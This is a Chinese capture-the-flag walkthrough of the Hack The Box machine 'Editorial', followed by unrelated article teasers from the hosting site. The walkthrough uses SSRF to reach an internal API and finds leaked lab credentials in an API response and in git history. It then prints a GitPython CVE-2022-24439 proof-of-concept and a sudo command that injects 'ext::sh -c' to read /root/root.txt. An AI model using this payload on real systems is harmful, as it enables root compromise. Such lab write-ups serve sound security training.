htb_Editorial

hack the book Editorial
在这里插入图片描述

端口扫描

80 22在这里插入图片描述

目录扫描
/upload
在这里插入图片描述

是一个上传book information的页面
其中最顶上有一个可以上传书本封面的地方,可以从本地上传,也可以从远程下载
这里可能涉及ssrf和本地文件上传,逐一尝试
在这里插入图片描述

随便上传一个图片文件,点击预览,最前面那个地方出现我们上传的图片
在这里插入图片描述

右键访问图片地址,直接就跳转到下载了
在这里插入图片描述

后面尝试上传shell文件,文件上传后被重命名,也没有找到利用方法
尝试远程文件下载,抓包
在这里插入图片描述
在这里插入图片描述

修改bookurl,包含http://127.0.0.1
在这里插入图片描述

ssrf的利用最常用的就是端口发现和本地文件探查,先试试最简单的端口发现
爆破端口
在这里插入图片描述
在这里插入图片描述

发现5000端口的消息长度不一样

在这里插入图片描述

回显一个地址
在这里插入图片描述

因为刚刚的包被我删掉了,重新抓包再修改url查看该目录的时候,发现回显404(这里没截图)

再重新访问5000端口,发现回显地址改变,很大可能该地址会有时间或者访问次数限制,隔一段时间会更新
在这里插入图片描述

于是直接抓post(upload-cover)和get两个包,发到Repeater
先访问5000端口,获得最新地址
在这里插入图片描述

再快速复制到get数据包的url里发送,果然有回显了
在这里插入图片描述
信息泄露

里面提到几个url地址
在这里插入图片描述
{"messages":[{"promotions":{"description":"Retrieve a list of all the promotions in our library.","endpoint":"/api/latest/metadata/messages/promos","methods":"GET"}},{"coupons":{"description":"Retrieve the list of coupons to use in our library.","endpoint":"/api/latest/metadata/messages/coupons","methods":"GET"}},{"new_authors":{"description":"Retrieve the welcome message sended to our new authors.","endpoint":"/api/latest/metadata/messages/authors","methods":"GET"}},{"platform_use":{"description":"Retrieve examples of how to use the platform.","endpoint":"/api/latest/metadata/messages/how_to_use_platform","methods":"GET"}}],"version":[{"changelog":{"description":"Retrieve a list of all the versions and updates of the api.","endpoint":"/api/latest/metadata/changelog","methods":"GET"}},{"latest":{"description":"Retrieve the last version of api.","endpoint":"/api/latest/metadata","methods":"GET"}}]}

继续使用ssrf进行本地文件探查

又回显一个地址

在这里插入图片描述
快速访问

泄露出一个用户名密码
在这里插入图片描述
Username: dev

Password: dev080217_devAPI!@

开放了22端口,ssh登录
在这里插入图片描述

用户中还有一个prod
在这里插入图片描述

dev用户没有提权权限,大概率要移动到prod用户
在这里插入图片描述

用户目录下有一个隐藏的.git目录
查看后发现logs目录下的HEAD

在 Git 中,每个分支都有一个指向最新提交的指针。当我们进行提交操作时,HEAD
会自动指向最新提交,并将分支的指针也更新到最新提交。换句话说,HEAD 在每次提交后都会随之移动。

HEAD 指向最新的提交时,我们可以使用 git log 命令查看提交历史记录,或使用 git show HEAD
命令查看最新提交的详细信息。
在这里插入图片描述
git show 1e84a036b2f33c59e2390730699a488c65643d28

回车回车

发现一个泄露的账号密码,正好是prod
在这里插入图片描述
Username: prod

Password: 080217_Producti0n_2023!@

ssh登录prod
在这里插入图片描述

该用户有sudo -l权限
在这里插入图片描述

prod对目录和文件都没有修改权限,只能从py文件功能下手
在这里插入图片描述

#!/usr/bin/python3import os
import sys
from git import Repoos.chdir('/opt/internal_apps/clone_changes')
//接受一个url参数,初始化git仓库
url_to_clone = sys.argv[1]r = Repo.init('', bare=True)
r.clone_from(url_to_clone, 'new_changes', multi_options=["-c protocol.ext.allow=always"])

查看git版本

pip3 list
在这里插入图片描述
版本3.1.29有cve,远程命令执行漏洞
CVE-2022-24439

poc

from git import Repo
r = Repo.init('', bare=True) r.clone_from('ext::sh -c touch% /tmp/pwned', 'tmp', multi_options=["-c protocol.ext.allow=always"])

修改poc,直接读取root.txt,

直接读取文件无回显
在这里插入图片描述
尝试将读出来的文件写入/tmp目录

sudo /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py "ext::sh -c cat% /root/root.txt% >% /tmp/root"

在这里插入图片描述
还可以反弹shell获取root权限

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/pingmian/30514.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

idea搜索只显示100条、如何修改idea搜索的条数

文章目录 一、老版本的IDEA(2021年之前的版本)二、新版本的IDEA(2021年及之后的版本)2.1、方式一2.2、方式二 如下图:idea搜索的时候默认只显示100条 要解决IDEA搜索只显示100条的问题,可以通过修改搜索结…

【UML用户指南】-19-对基本行为建模-用例图

目录 1、组成结构 2、表示法 3、一般用法 3.1、对主题的语境建模 3.2、对主题的需求建模 4、常用建模技术 4.1、对系统的语境建模 4.1.1、设计过程 4.2、对系统的需求建模 4.2.1、设计过程: 5、正向工程 UML 中的用例图是对系统的动态方面建模的 5 种图之…

进入docker容器内部操作mysql数据库

文章目录 1、查询docker容器2、进入mysql容器内部3、连接mysql数据库4、查询mysql所有的数据库5、使用某个数据库6、展示数据库中所有的表7、查询某张表8、断开mysql9、退出mysql容器 1、查询docker容器 [rootlocalhost ~]# docker ps CONTAINER ID IMAGE …

商城小程序:颠覆传统电商,打造全新商业生态

在数字化浪潮的推动下,网购行业呈现多元化繁荣发展态势,出现了琳琅满目的商品应用小程序,但市面上的商城小程序基本属于通用型,无论是商城界面展示和基本功能,都不能满足个性化和商品推广需求,阻碍了商品的…

Building wheels for collected packages: mmcv, mmcv-full 卡住

安装 anime-face-detector 的时候遇到一个问题:Installation takes forever #1386:在构建mmcv-full时卡住,这里分享下解决方法(安装 mmcv 同理,将下面命令中的 mmcv-full 替换成 mmcv) 具体表现如下&#x…

基于Java技术的家乡特色推荐系统

开头语:你好呀,我是计算机学姐码农小野!如果有相关需求,可以私信联系我。 开发语言:Java 数据库:MySQL 技术:Java技术,SpringBoot框架 工具:Eclipse,Navi…

强大的多数据库客户端工具:DataGrip【送源码】

今天给大家带来的工具是:DataGrip 介绍 DataGrip是jetbrains开发的一款关系数据库和 NoSQL 数据库的多数据库客户端工具,可以30天免费试用,后续使用需要购买。 DataGrip还是一款强大的跨平台工具,支持多种操作系统,比…

英伟达市值飙升,超越苹果微软并超过英国股市总市值

原标题:英伟达超越苹果微软市值,成为全球市值最高的企业 易采游戏网6月19日消息:近日,美国科技巨头英伟达市值的迅速增长引起了市场广泛关注。据最新数据显示,截至本周二收盘,英伟达的市场资本化已达到3.34…

基于Redis提高查询性能(保持数据一致性)

Redis实战篇 | Kyles Blog (cyborg2077.github.io) 目录 背景 商户查询缓存(根据ID查询) 根据店铺类型查询(List型) 缓存更新策略(保证数据一致性) 案例(利用缓存更新策略) 背景 起初客户端…

【pytorch01】简单回归问题

1.梯度下降(Gradient Descent) y x 2 ∗ s i n ( x ) yx^{2}*sin(x) yx2∗sin(x) y ′ 2 ∗ x ∗ s i n ( x ) x 2 ∗ c o s ( x ) y2*x*sin(x) x^{2}*cos(x) y′2∗x∗sin(x)x2∗cos(x) 求最小值要求导 梯度下降定义:梯度下降要迭代计…

【决战欧洲杯巅峰】AI模型预测[走地数据]初步准备工作

数据准备 首先,我们需要收集一些与欧洲杯比赛相关的历史数据。这些数据可能包括球队的历史战绩、球员的能力评分、比赛场地信息、历史交锋记录等。这些数据可以从公开来源获取,并进行适当的预处理和清洗。 特征提取 接下来,我们需要从收集…

vue3+ts+vite集成eslint

项目中安装eslint yarn add eslint -Deslint初始化 npx eslint --init按照下方操作即可 安装typescript-eslint/parser yarn add typescript-eslint/parser -D安装vite-plugin-eslint2 yarn add vite-plugin-eslint2 -D配置vite-plugin-eslint2 // vite.config.ts import …

Flask新手入门(一)

前言 Flask是一个用Python编写的轻量级Web应用框架。它最初由Armin Ronacher作为Werkzeug的一个子项目在2010年开发出来。Werkzeug是一个综合工具包,提供了各种用于Web应用开发的工具和函数。自发布以来,Flask因其简洁和灵活性而迅速受到开发者的欢迎。…

【计算机网络仿真实验-实验2.7】单臂路由

实验2.7 单臂路由 1. 实验拓扑图 2. 测试连通性 测试PC1 PC2 PC3 之间的连通性 无法ping通,因为它们处在不同的网段,而二层交换机不具备路由功能,因此没办法接通 3. 在交换机上创建vlan10,并将端口0/2划分到vlan10中 Switch>…

Java并发编程深度解析:构建高并发应用的实践与探究

摘要:随着互联网技术的飞速发展,大型分布式系统对并发处理能力的要求越来越高。Java作为企业级应用的主流开发语言,在并发编程方面有着深厚的积累和强大的生态支持。本文将深入探讨Java并发编程的基础知识,高级技巧,以…

HTML基本标签使用【超链接标签、表格标签、表单标签、input标签】

目录 一、基本介绍1.1 概念1.2 HTML的核心特点 二、HTML基本标签三、超链接标签四、表格标签✌<table> 标签属性✍<tr> 标签属性✌ <td> 和 <th> 标签属性演示注意事项 五、表单标签综合应用 最后 一、基本介绍 1.1 概念 HTML&#xff0c;全称为超文…

SpringBoot集成slf4j日志配置

目录 前言 1、slf4j概述 2、pom.xml的日志依赖 3、application.yml的日志配置 4、logback.xml配置文件定义 5、logback.xml配置文件解析 5.1 定义日志的存储路径 5.2 定义日志的输出格式 5.3 定义控制台输出 5.4 定义日志相关参数 5.5 定义日志的输出级别 6、测试日…

利用JAVA语言调用GLM-4接口实战指南

一、什么是API接口 API&#xff08;Application Programming Interface&#xff0c;应用程序编程接口&#xff09;是一种软件接口&#xff0c;它定义了不同应用程序之间如何相互通信、交互。API接口分为很多种&#xff0c;常见的有Web API&#xff0c;数据库API&#xff0c;操…

数据结构-算法和算法分析

目录 前言一、算法1.1 算法与程序1.2 算法描述方法1.3 算法特性1.4 算法设计的要求 二、算法分析2.1 算法时间效率的度量2.1.1 事前分析方法算法的渐进时间复杂度算法时间复杂度分析例子算法最坏时间复杂度时间复杂度的计算规则 2.2 算法空间效率的度量 总结 前言 程序 数据结…

如何相互转换图片格式?如何转换jpg、bmp、png格式?

图片的格式有很多种&#xff0c;常见的有jpg、bmp、png格式&#xff0c;这些格式本质上没有太大区别&#xff0c;安卓和电脑都可以直接打开查看&#xff0c;但有时还是会用到一些固定的格式&#xff0c;例如&#xff0c;上传个人信息时&#xff0c;如果图片格式不符合要求&…